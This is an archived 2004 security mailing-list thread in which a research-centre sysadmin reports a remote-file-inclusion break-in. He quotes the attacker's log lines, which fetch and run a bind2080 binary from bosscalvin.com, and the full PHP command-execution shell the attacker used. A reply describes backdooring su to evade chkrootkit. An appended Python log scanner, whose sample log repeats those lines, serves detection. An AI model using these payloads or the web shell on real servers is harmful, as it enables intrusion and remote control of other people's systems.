Re: Hack attempt

mike_at_genxweb.net
Date: 07/23/04

  • Next message: Scott Gifford: "Re: Access to nfs server, Part 2"
    Date: Fri, 23 Jul 2004 13:28:19 -0400
    To: Kevin Johnson <kjohnson@secureideas.net>
    
    

    Correct me if I am wrong, doesn't chkrootkit only check system files for kits?
    Looks like he just downloaded normal tools not having any back doors in them. An
    eggdrop itself is not considered a trojan unless it is not wanted. But how
    does chkrootkit know if it is wanted or not?

    I also would not rely on chkrootkit. I ran a root war once where I downloaded
    the GNU source for the su command, backdoored it with a second arg and
    installed it using touch to change the date. chkrootkit did not detect this
    change.

    Quoting Kevin Johnson <kjohnson@secureideas.net>:

    > Hi-
    >
    > It appears that the file <some script>.php is vulnerable to a file
    > injection. Basically what that means is that it accepts whatever value
    > someone puts into the bodyfile variable and inserts its code before
    > parsing the script. This allows the attacker to run whatever code as
    > the user that your web server runs as. You will need to fix the code to
    > not allow inserting remote files.
    >
    > If you need any more information, feel free to reply and I will try to
    > help.
    >
    > Kevin Johnson
    >
    >
    > On Wed, 2004-07-21 at 11:02, Norbert Crettol wrote:
    > > Hi all.
    > >
    > > This is my first post here. I'm Norbert Crettol, one of the sysadmins
    > > of Idiap, a research center in Switzerland (www.idiap.ch).
    > >
    > > We've had an undesired visitor, last night, that I discovered in the
    > > reports of tripwire.
    > >
    > > Here are the logs we got (we get a remote copy of the web server logs
    > > in another host). As of the second line, I've stripped the head and
    > > the tail of the line which is always the same.
    > > --- begin ---
    > > "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
    > > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
    > > --- end ---
    > > I've seen no other
    > >
    > > It looks like bind8080 has created a directory /var/lock/.tmp
    > > and expanded an (owned by the web server owner) archive there. Here
    > > is the list of the files :
    > > 3225 jui 20 03:53 c-leet
    > > 15 jui 20 03:47 c-leet.dir
    > > 51 jui 20 03:47 cron.d
    > > 512 mai 12 2002 doc/
    > > 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
    > > 2523568 mai 12 2002 eggdrop-1.6.10*
    > > 512 mai 12 2002 filesys/
    > > 343 fév 11 03:55 ****
    > > 512 mai 12 2002 help/
    > > 21149 nov 4 2003 kik*
    > > 1024 jui 21 11:00 language/
    > > 512 mai 12 2002 logs/
    > > 6 jui 20 03:48 pid.CaEm-
    > > 23065 jan 29 15:00 proc*
    > > 6 jui 20 03:48 psybnc.pid
    > > 28591 mai 12 2002 README
    > > 89 jui 20 03:53 run*
    > > 588 avr 1 10:00 run-*
    > > 708 avr 1 10:00 run--*
    > > 512 mar 31 08:12 scripts/
    > > 512 mai 12 2002 text/
    > > 2523568 mar 28 01:41 vi*
    > > 30293 nov 17 2002 xhide*
    > > 182 jui 20 03:47 y2kupdate*
    > >
    > > Here is the content of http://www.bosscalvin.com/inject.txt :
    > > --- begin ---
    > > <font color="red">
    > > <br><font face="Comic Sans MS" size="2"><center>
    > > <b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
    > > <b>#</b> CMD PHP : <br>
    > > <b>#</b> Released by : <b>SecurityCorp</b><br>
    > > <b>#</b> Edited by CaEm
    > > <br>
    > > <br>
    > > <hr color="red" width=751px height=115px>
    > > <br>
    > > <pre><font face="Verdana" size="1">
    > > <?
    > > // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
    > > if (isset($chdir)) @chdir($chdir);
    > > ob_start();
    > > system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
    > > $output = ob_get_contents();
    > > ob_end_clean();
    > > if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
    > > ?>
    > > </font></pre>
    > > <br>
    > > <hr color="red" width=751px height=115px>
    > > <br>
    > > <font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
    > > --- end ---
    > >
    > > Has someone seen this kind of attack? (chkrootkit doesn't detect it).
    > > Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org)?
    > > Is there a way to stop this guy? His nickname (CaEm) appears in the
    > > uploaded scripts.
    > >
    > > Norbert
    > >
    >
    >
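As an added example (not code from anyone in this thread), a small Python scanner that flags the remote-file-inclusion pattern visible in Norbert's logs, namely a query parameter whose value is a remote URL, and decodes the accompanying `cmd` value so an admin can see what was run. The log lines and IP addresses below are constructed for the example, and the script name is a placeholder.

```python
"""Flag remote-file-inclusion (RFI) attempts in Apache combined-format access logs."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines modelled on the ones posted in the thread
# (placeholder client IPs and script name; one benign request, two RFI requests).
SAMPLE_LOG = """\
10.0.0.1 - - [21/Jul/2004:03:47:01 +0200] "GET /index.php?page=about HTTP/1.0" 200 512 "-" "Mozilla/4.0"
10.0.0.2 - - [21/Jul/2004:03:47:15 +0200] "GET /script.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.2 - - [21/Jul/2004:03:48:02 +0200] "GET /script.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080 HTTP/1.0" 200 6625 "-" "Mozilla/4.0"
"""

# Client IP, timestamp, request line and status code of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def scan_line(line):
    """Return a finding dict if any query parameter carries a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("path")).query
    # keep_blank_values so the trailing "inject.txt?" quirk does not drop fields;
    # parse_qsl also percent-decodes, so "cd%20/var/lock/" becomes readable.
    params = parse_qsl(query, keep_blank_values=True)
    for key, value in params:
        if value.lower().startswith(REMOTE_SCHEMES):
            cmd = next((v for k, v in params if k == "cmd"), None)
            return {"ip": m.group("ip"), "time": m.group("ts"), "param": key,
                    "url": value, "cmd": cmd, "status": int(m.group("status"))}
    return None


def scan_log(text):
    """Scan a whole log and return the list of findings in order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        # A 200 on such a request means the include succeeded and the host needs checking.
        print(f"{f['time']} {f['ip']} {f['param']}={f['url']} cmd={f['cmd']!r} status={f['status']}")
```

Run it against the real log with `scan_log(open(path).read())`; any hit with a 200 status is a request the server served, which is the moment to look at the web server user's writable directories such as /var/lock, as in the listing above.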

